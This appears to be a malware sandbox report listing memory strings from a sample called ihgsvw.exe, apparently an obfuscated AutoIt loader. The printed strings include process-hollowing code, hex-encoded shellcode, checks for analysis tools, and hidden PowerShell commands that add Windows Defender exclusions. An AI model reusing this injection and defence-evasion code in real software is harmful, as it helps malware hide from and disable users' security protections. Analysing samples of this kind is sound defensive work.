      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l $_y0x3856f9da1ec28a69 = dllstructcreate("byte inheritedaddressspace;" & "byte readimagefileexecoptions;" & "byte beingdebugged;" & "byte spare;" & "ptr mutant;" & "ptr imagebaseaddress;" & "ptr loaderdata;" & "ptr processparameters;" & "ptr subsystemdata;" & "ptr processheap;" & "ptr fastpeblock;" & "ptr fastpeblockroutine;" & "ptr fastpebunlockroutine;" & "dword environmentupdatecount;" & "ptr kernelcallbacktable;" & "ptr eventlogsection;" & "ptr eventlog;" & "ptr freelist;" & "dword tlsexpansioncounter;" & "ptr tlsbitmap;" & "dword tlsbitmapbits[2];" & "ptr readonlysharedmemorybase;" & "ptr readonlysharedmemoryheap;" & "ptr readonlystaticserverdata;" & "ptr ansicodepagedata;" & "ptr oemcodepagedata;" & "ptr unicodecasetabledata;" & "dword numberofprocessors;" & "dword ntglobalflag;" & "byte spare2[4];" & "int64 criticalsectiontimeout;" & "dword heapsegmentreserve;" & "dword heapsegmentcommit;" & "dword heapdecommittotalfreethreshold;" & "dword heapdecommitfreeblockthreshold;" & "dword numberofheaps;" & "dword maximumnumberofheaps;" & "ptr processheaps;" & "ptr gdisharedhandletable;" & "ptr processstarterhelper;" & "ptr gdidcattributelist;" & "ptr loaderlock;" & "dword osmajorversion;" & "dword osminorversion;" & "dword osbuildnumber;" & "dword osplatformid;" & "dword imagesubsystem;" & "dword imagesubsystemmajorversion;" & "dword imagesubsystemminorversion;" & "dword gdihandlebuffer[34];" & "dword postprocessinitroutine;" & "dword tlsexpansionbitmap;" & "byte tlsexpansionbitmapbits[128];" & "dword sessionid")d
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "readprocessmemory", "ptr", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de1ec28a69, "ptr", dllstructgetptr($_y0x3856f9da1ec28a69), "dword_ptr", dllstructgetsize($_y0x3856f9da1ec28a69), "dword_ptr*", 0)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endif.n
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endifzn
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endifpn
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endifin
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endifon8
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endifbn;
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endiffn_
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: case 1
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endif
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: case 3
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: case 2
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nextk
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wend-m
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfuncym
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endif_m
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfuncrm
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfuncpm)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tructsetdata($_y0x3856f9da1ec28a69, "imagebaseaddress", $_y0x3856f9de14e2ba5f487d3ca88dd6)f
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "writepro" & "cessmemory", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de1ec28a69, "ptr", dllstructgetptr($_y0x3856f9da1ec28a69), "dword_ptr", dllstructgetsize($_y0x3856f9da1ec28a69), "dword_ptr*", 0)$
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllstructsetdata($_y0x3856f9da0dc886645d4a019f, "e" & "ax", $_y0x3856f9de14e2ba5f487d3ca88dd6 + $_y0x3856f9c70be9bc4261423aaf97fb1960b653)#
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllstructsetdata($_y0x3856f9da0dc886645d4a019f, "rcx", $_y0x3856f9de14e2ba5f487d3ca88dd6 + $_y0x3856f9c70be9bc4261423aaf97fb1960b653),
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "setthreadcontext", "handle", $_y0x3856f9c61aefba5579760c, "ptr", dllstructgetptr($_y0x3856f9da0dc886645d4a019f))
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "dword", "resumethread", "handle", $_y0x3856f9c61aefba5579760c)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllcall("kernel32.dll", "bool", "closehandle", "handle", $_y0x3856f9c61ef5a7537d61269f)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllcall("kernel32.dll", "bool", "closehandle", "handle", $_y0x3856f9c61aefba5579760c)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return dllstructgetdata($_y0x3856f9da3ef5a7537d61269990e1314a9367a9627b43cd06, "processid")0
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func _runbinary_fixreloc($_y0x3856f9de03e8ac4574770c, $_y0x3856f9da0ae6bc5141, $_y0x3856f9de0fe3ac427d6126889cf80e, $_y0x3856f9de0fe3ac427d61268995eb0e, $_y0x3856f9c807eaa9577d4a63f2a0)#
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9c718eeba446d7339879deb2540927991, $_y0x3856f9c71deeb255777417aa96ec3c7c, $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9da0be9ba597d610c, $_y0x3856f9c70ae6bc5141, $_y0x3856f9da0fe3ac427d61269f
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9c708eba95741 = 3 + 7 * $_y0x3856f9c807eaa9577d4a63f2a0
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: while $_y0x3856f9c71ce2a4516c7b23a3b4e02140b8 < $_y0x3856f9c71deeb255410
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029 = dllstructcreate("dword virtualaddress; dword sizeofblock", $_y0x3856f9de0ae6bc5141 + $_y0x3856f9c71ce2a4516c7b23a3b4e02140b8)$
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9c718eeba446d7339879deb2540927991 = dllstructgetdata($_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029, "virtualaddress")"
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9c71deeb255777417aa96ec3c7c = dllstructgetdata($_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029, "sizeofblock")
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f = ($_y0x3856f9c71deeb255777417aa96ec3c7c - 8) / 21
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9da0be9ba597d610c = dllstructcreate("word[" & $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f & "]", dllstructgetptr($_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029) + 8)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9c70ae6bc5141 = dllstructgetdata($_y0x3856f9da0be9ba597d610c, 1, $_y0x3856f9c717)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if bitshift($_y0x3856f9c70ae6bc5141, 12) = $_y0x3856f9c708eba95741 then,
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9da0fe3ac427d61269f = dllstructcreate("ptr", $_y0x3856f9de03e8ac4574770c + $_y0x3856f9c718eeba446d7339879deb2540927991 + bitand($_y0x3856f9c70ae6bc5141, 0xfff))"
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllstructsetdata($_y0x3856f9da0fe3ac427d61269f, 1, dllstructgetdata($_y0x3856f9da0fe3ac427d61269f, 1) + $_y0x3856f9c70ae2a444794b)"
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func _runbinary_allocateexespaceataddress($_y0x3856f9c61ef5a7537d61269f, $_y0x3856f9de0fe3ac427d61269f, $_y0x3856f9c71deeb25541):
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "ptr", "virtualallocex", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de0fe3ac427d61269f, "dword_ptr", $_y0x3856f9c71deeb25541, "dword", 0x1000, "dword", 64)9
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "ptr", "virtualallocex", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de0fe3ac427d61269f, "dword_ptr", $_y0x3856f9c71deeb25541, "dword", 0x3000, "dword", 64)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func _runbinary_allocateexespace($_y0x3856f9c61ef5a7537d61269f, $_y0x3856f9c71deeb25541)3
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "ptr", "virtualallocex", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", 0, "dword_ptr", $_y0x3856f9c71deeb25541, "dword", 0x3000, "dword", 64)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func _runbinary_unmapviewofsection($_y0x3856f9c61ef5a7537d61269f, $_y0x3856f9de0fe3ac427d61269f)!
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllcall("ntdll.dll", "int", "ntunmapviewofsection", "ptr", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de0fe3ac427d61269f)#
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "iswow64process", "handle", $_y0x3856f9c61ef5a7537d61269f, "bool*", 0)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $binbuffer = dllstructcreate("byte[" & binarylen($binary) & "]")/
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $ret = dllcall("user32.dll", "int", "callwi" & "ndowprocw", "ptr", dllstructgetptr($bufferasm), "ws" & "tr", $sexemodule, "ptr", dllstructgetptr($binbuffer), "int", 0, "int", 0)w
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $ssssss = "/x6/e84e//////6b//65//72//6e//65//6c//33//32//////6e//74//64//6c//6c//////////////////////////////////////////////////////////////////////////////////////////////////////5b8bfc6a42e8bb/3////8b54242889118b54242c6a3ee8aa/3////89116a4ae8a1/3////89396a1e6a3ce89d/3////6a2268f4//////e891/3////6a266a24e888/3////6a2a6a4/e87f/3////"u
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ssssss &= "6a2e6a/ce876/3////6a3268c8//////e86a/3////6a2ae85c/3////8b/9c7/144//////6a12e84d/3////685be814cf51e879/3////6a3ee83b/3////8bd16a1ee832/3////6a4/ff32ff31ffd/6a12e823/3////685be814cf51e84f/3////6a1ee811/3////8b/98b513c6a3ee8/5/3////8b39/3fa6a22e8fa/2////8b/968f8//////5751ffd/6a//e8e8/2////6888feb31651e814/3////6a2ee8d6/2//"u
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ssssss &= "//8b396a2ae8cd/2////8b116a42e8c4/2////57526a//6a//6a/46a//6a//6a//6a//ff31ffd/6a12e8a9/2////68d/371/f251e8d5/2////6a22e897/2////8b116a2ee88e/2////8b/9ff7234ff31ffd/6a//e87e/2////689c951a6e51e8aa/2////6a22e86c/2////8b118b396a2ee861/2////8b/96a4/68//3/////ff725/ff7734ff31ffd/6a36e847/2////8bd16a22e83e/2////8b396a3ee835/2//"u
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ssssss &= "//8b316a22e82c/2////8b/16a2ee823/2////8b/952ff775456ff7/34ff316a//e81//2////68a16a3dd851e83c/2////83c4/cffd/6a12e8f9/1////685be814cf51e825/2////6a22e8e7/1////8b1183c2/66a3ae8db/1////6a/25251ffd/6a36e8ce/1////c7/1////////b828//////6a36e8bc/1////f7216a1ee8b3/1////8b118b523c81c2f8///////3d/6a3ee89f/1/////3116a26e896/1////6a"u
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ssssss &= "2852ff316a12e88a/1////685be814cf51e8b6/1////83c4/cffd/6a26e873/1////8b398b/98b71146a3ee865/1/////3316a26e85c/1////8b/98b51/c6a22e85//1////8b/9/351346a46e844/1////8bc16a2ee83b/1////8b/95/ff771/5652ff316a//e82a/1////68a16a3dd851e856/1////83c4/cffd/6a36e813/1////8b1183c2/189116a3ae8/5/1////8b/93bca/f8533ffffff6a32e8f4//////"u
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ssssss &= "8b/9c7/1/7///1//6a//e8e5//////68d2c7a76851e811/1////6a32e8d3//////8b116a2ee8ca//////8b/952ff71/4ffd/6a22e8bb//////8b3983c7346a32e8af//////8b318bb6a4//////83c6/86a2ee89d//////8b116a46e894//////516a/45756ff326a//e886//////68a16a3dd851e8b2//////83c4/cffd/6a22e86f//////8b/98b5128/351346a32e86///////8b/981c1b///////89116a//e8"u
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ssssss &= "4f//////68d3c7a7e851e87b//////6a32e83d//////8bd16a2ee834//////8b/9ff32ff71/4ffd/6a//e824//////68883f4a9e51e85///////6a2ee812//////8b/9ff71/4ffd/6a4ae8/4//////8b2161c38bcb/34c24/4c36a//e8f2ffffff6854caaf9151e81e//////6a4/68//1/////ff7424186a//ffd/ff742414e8cfffffff89/183c41/c3e822//////68a44e/eec5/e84b//////83c4/8ff7424/4"u
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ssssss &= "ffd/ff7424/85/e838//////83c4/8c355525153565733c/648b7/3/8b76/c8b761c8b6e/88b7e2/8b3638471875f38/3f6b74/78/3f4b74/2ebe78bc55f5e5b595a5dc35552515356578b6c241c85ed74438b453c8b542878/3d58b4a188b5a2//3dde33/498b348b/3f533ff33c/fcac84c/74/7c1cf/d/3f8ebf43b7c242/75e18b5a24/3dd668b/c4b8b5a1c/3dd8b/48b/3c55f5e5b595a5dc3c3////////"
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $owmi = objget("winmgmts:\\localhost\root\securitycenter2")
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fe1cc89e6f4a411499bfda1b69b8
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _runbinary_allocateexespaceataddressu
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c80ff2bc5f51660df0cdd6p\b8;u
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user~1\appdata\local\temp6u
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6!u
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720ee97637d6621af97e8247c\u
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9da3df3a9426c6725af97e9387cwu
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ed01c99c7540460a80acc31b7cbu
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9db20eeab5f7c770ab29ce2277c}u
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ef20f3a16f5a7d218d90e33b7chu
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9e61ed880714b5a068fa3ca0ecu
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9e61ed880714b5a0387b5d6
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ed0fcb8f6f4d411094b2ca0e7c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0ab698fb3f7c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ed0fcb8f6f59570699c8bd6f7c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user~1\appdata\local\temp
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ea27f4974479613eab97fd307c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fe2bf5bb596b6630a89aea0ei
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _runbinary_allocateexespaceataddress
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9eb36e28b456c771ba794ea0e
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9eb36e28b456c771ba794ea0e0b8
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9dd0bffad7d777620aa9cd6ini
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ed0fcb8f6f59570699c8b6657c8t
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d63t
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9db20eebb536a7b25b29de6257c.t
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ed0fcb8f6f59570699cbba617cyt
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cc0ceea6516a6b1cab98e8327ctt
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9dd2de8a55d797c31aa90e1327cot
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $usb = $objantivirusproduct.displaynamezt
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if winexists("process explorer") thenut
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: for $objantivirusproduct in $colitems
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if processexists("regshot.exe") then
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if winexists("process explorer") then
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if processexists("taskmgr.exe") then
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lexecute("powershell"," -command add-mppreference -exclusionpath " & @scriptdir,"","",@sw_hide)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'","","",@sw_hide)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbs'","","",@sw_hide)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbe'","","",@sw_hide)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbs'","","",@sw_hide)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: word machine;word numberofsections;dword timedatestamp;dword pointertosymboltable;dword numberofsymbols;,r*
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.1_none_2c87ca0024d60201
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbe'","","",@sw_hide)!q/
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5*20c39e26/304/6/3052_4f0*2_d30_2_d70c2_e///05/75f2d/50920fd43039//e6266e20444f53206d6f64652e0d0d0*24nql
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 00@s0
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =0;p8
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a;1p>
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a-}pz
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a+epb
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endifu
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunch
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f9e720e1x~d
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ea27f5fb536c7d27bfa6df36518953
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ef3bf3a765687634b29cd6
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: createobject("wscript.shell").run "
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720ee97637d6621af97e8247c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ea27f5fb536c7d27bfa6df365189539|
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ea27f5fb536c7d27bfa6df36518953(|2
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6'|!
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9eb36e28b456c771ba794ea0ev|p
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6e|o
